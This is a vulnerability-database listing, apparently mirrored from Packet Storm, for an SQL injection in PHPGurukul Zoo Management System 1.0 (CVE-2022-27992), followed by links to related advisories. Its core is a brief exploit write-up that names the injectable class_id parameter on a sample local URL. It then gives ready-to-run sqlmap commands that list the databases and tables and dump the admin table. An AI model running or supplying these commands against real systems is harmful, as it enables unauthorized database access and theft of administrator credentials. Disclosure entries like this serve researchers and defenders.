Lucene search
D4rkP0w4r, raw.githubusercontent.comPACKETSTORM:166648HistoryApr 08, 2022 - 12:00 a.m.
PHPGurukul Zoo Management System 1.0 SQL Injection
2022-04-0800:00:00
D4rkP0w4r, raw.githubusercontent.com
packetstormsecurity.com
312
0.002 Low
EPSS
Percentile
56.2%
`# Zoo Management System SQL Injection
# Author: D4rkP0w4r
* Description => sql injection at /animals?class_id=1
* Injection Point
http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1
# Exploit
* Exploit with Sqlmap
python3 sqlmap.py -u http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1 -dbs
python3 sqlmap.py -u http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1 -tables -D zoomanagement
python3 sqlmap.py -u http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1 -columns -D zoomanagement -T admin -dump
# Vulnerable Code
* No filter `class_id` when inserting data to database
`
Related
nvd
nvd
CVE-2022-27992
2022-04-08 09:15:11
zdt
zdt
PHPGurukul Zoo Management System 1.0 SQL Injection Vulnerability
2022-04-08 00:00:00
cve
cve
CVE-2022-27992
2022-04-08 09:15:11
prion
prion
Sql injection
2022-04-08 09:15:00
cnvd
cnvd
PHPGURUKUL Zoo Management System SQL Injection Vulnerability
2022-04-15 00:00:00
cvelist
cvelist
CVE-2022-27992
2022-04-08 08:23:46